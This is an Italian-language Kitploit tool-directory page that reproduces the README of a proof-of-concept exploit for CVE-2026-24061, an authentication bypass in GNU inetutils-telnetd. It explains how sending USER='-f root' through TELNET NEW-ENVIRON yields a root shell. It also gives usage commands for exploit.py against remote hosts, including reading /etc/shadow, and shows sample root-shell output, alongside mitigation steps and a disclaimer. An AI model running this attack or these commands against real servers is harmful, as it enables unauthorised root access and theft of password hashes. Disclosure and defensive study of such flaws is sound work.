Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-24061 — inetutils-telnetd Bypass dell'autenticazione - funzionante | Kitploit
Strumenti/GitHubGitHub/balgan/cve-2026-24061
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza di RetePenetration TestingAutenticazione
GitHubbalgan/cve-2026-24061

CVE-2026-24061

inetutils-telnetd Bypass dell'autenticazione - funzionante

Vedi Repository
37 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-24061 — Bypass dell'autenticazione in inetutils-telnetd

Una proof-of-concept per la vulnerabilità di bypass dell'autenticazione in GNU inetutils-telnetd.

Panoramica

CVE-2026-24061 è una vulnerabilità critica di bypass dell'autenticazione che colpisce le versioni 1.9.3 fino alla 2.7 di inetutils-telnetd. Consente a un attaccante remoto di ottenere una shell di root su sistemi vulnerabili senza fornire alcuna credenziale.

Dettagli della vulnerabilità

CampoValore
ID CVECVE-2026-24061
Software interessatoGNU inetutils-telnetd
Versioni interessate1.9.3 – 2.7
Tipo di vulnerabilitàBypass dell'autenticazione
Punteggio CVSSCritico
Vettore di attaccoRete

Come funziona

La vulnerabilità sfrutta un difetto nel modo in cui telnetd gestisce la variabile d'ambiente USER ricevuta tramite l'opzione TELNET NEW-ENVIRON (RFC 1572) durante la negoziazione del protocollo.

  1. Negoziazione del protocollo TELNET: Quando un client si connette, il server e il client negoziano le capacità, inclusa l'opzione NEW-ENVIRON, che consente al client di inviare variabili d'ambiente.

  2. Valore USER dannoso: L'exploit invia USER=-f root come variabile d'ambiente durante questa fase di negoziazione.

  3. Passaggio di argomenti non sicuro: Il telnetd vulnerabile passa questo valore non sanificato al programma login.

  4. Iniezione di comandi: Il programma login interpreta -f root come flag da riga di comando:

    • -f = "forza il login senza autenticazione"
    • root = il nome utente con cui effettuare il login
  5. Accesso root: L'attaccante ottiene una shell di root senza che gli venga mai richiesta una password.

Il problema principale

root@kitploit:~
Client invia:  USER = "-f root"
telnetd esegue:  login -f root
Risultato:        Shell di root concessa senza autenticazione

Ciò equivale a eseguire USER='-f root' telnet -a localhost su un sistema con un telnetd vulnerabile.

Requisiti

  • Python 3.6+
  • Nessuna dipendenza esterna (usa solo la libreria standard)

Installazione

root@kitploit:~
git clone https://github.com/yourusername/CVE-2026-24061.git
cd CVE-2026-24061
chmod +x exploit.py

Utilizzo

root@kitploit:~
./exploit.py [OPZIONI] <target>

Opzioni

OpzioneDescrizionePredefinito
hostHostname o indirizzo IP del targetObbligatorio
-p, --portPorta del target23
-u, --userValore USER da iniettare-f root
-c, --commandEsegue un singolo comando (non interattivo)Nessuno
-t, --timeoutTimeout di connessione in secondi10

Esempi

Shell di root interattiva su localhost:

root@kitploit:~
./exploit.py localhost

Shell di root interattiva su host remoto:

root@kitploit:~
./exploit.py 192.168.1.100

Esegue un singolo comando ed esce:

root@kitploit:~
./exploit.py -c "id" localhost
./exploit.py -c "cat /etc/shadow" 192.168.1.100
./exploit.py -c "whoami && hostname" target.local

Login come utente diverso:

root@kitploit:~
./exploit.py -u "-f admin" localhost
./exploit.py -u "-f postgres" database-server

Porta non standard:

root@kitploit:~
./exploit.py -p 2323 localhost

Combina le opzioni:

root@kitploit:~
./exploit.py -p 2323 -c "uname -a" -t 5 192.168.1.100

Modalità interattiva

Quando viene eseguito senza il flag -c, l'exploit ti porta in una shell interattiva:

  • Supporto completo del TTY con gestione corretta del terminale
  • Premi Ctrl+] per uscire e chiudere la connessione
  • Premi Ctrl+C per interrompere

Esempio di output

root@kitploit:~
╔══════════════════════════════════════════════════════════════╗
║  CVE-2026-24061 - Bypass dell'autenticazione in inetutils-telnetd ║
║  Colpisce: inetutils-telnetd 1.9.3 - 2.7                      ║
╚══════════════════════════════════════════════════════════════╝

[*] Connesso a 192.168.1.100:23
[*] Negoziazione delle opzioni TELNET...
[*] Accettato NEW-ENVIRON (invio di USER='-f root')
[+] Inviato USER='-f root' tramite NEW-ENVIRON

Linux vulnerable-host 5.15.0 #1 SMP x86_64 GNU/Linux

root@vulnerable-host:~# id
uid=0(root) gid=0(root) groups=0(root)
root@vulnerable-host:~# 

Mitigazione

Azioni immediate

  1. Disabilita telnetd: Se non strettamente necessario, disabilita completamente il servizio telnet

    root@kitploit:~
    sudo systemctl stop inetutils-telnetd
    sudo systemctl disable inetutils-telnetd
    
  2. Usa SSH al suo posto: Sostituisci telnet con SSH per l'accesso remoto

    root@kitploit:~
    sudo apt install openssh-server
    
  3. Regole del firewall: Blocca la porta 23 dalle reti non fidate

    root@kitploit:~
    sudo ufw deny 23/tcp
    

Correzione a lungo termine

  • Aggiorna a una versione patchata di inetutils quando disponibile
  • Monitora gli advisory dei fornitori per le patch di sicurezza

Dettagli tecnici

L'exploit implementa un client TELNET minimale che:

  1. Stabilisce una connessione TCP al target
  2. Risponde alle negoziazioni delle opzioni TELNET (DO/DONT/WILL/WONT)
  3. Quando il server richiede le variabili d'ambiente tramite NEW-ENVIRON:
    • Invia USER=-f root nella risposta ENV_IS
  4. Gestisce le negoziazioni del tipo di terminale (TTYPE) e della dimensione della finestra (NAWS)
  5. Fornisce modalità interattiva o di esecuzione di comandi

RFC pertinenti

  • RFC 854 — Specifica del protocollo TELNET
  • RFC 1572 — Opzione ambiente TELNET

Disclaimer

Questo strumento è fornito esclusivamente per scopi educativi e di test di sicurezza autorizzati.

  • Usa questo exploit solo su sistemi di tua proprietà o per i quali hai esplicita autorizzazione scritta per il test
  • L'accesso non autorizzato a sistemi informatici è illegale nella maggior parte delle giurisdizioni
  • Gli autori non sono responsabili per qualsiasi uso improprio o danno causato da questo strumento

Licenza

Licenza MIT — Vedi LICENSE per i dettagli.

Riferimenti

  • Dettagli CVE-2026-24061
  • GNU inetutils
  • Protocollo TELNET RFC 854
Scarica lo strumento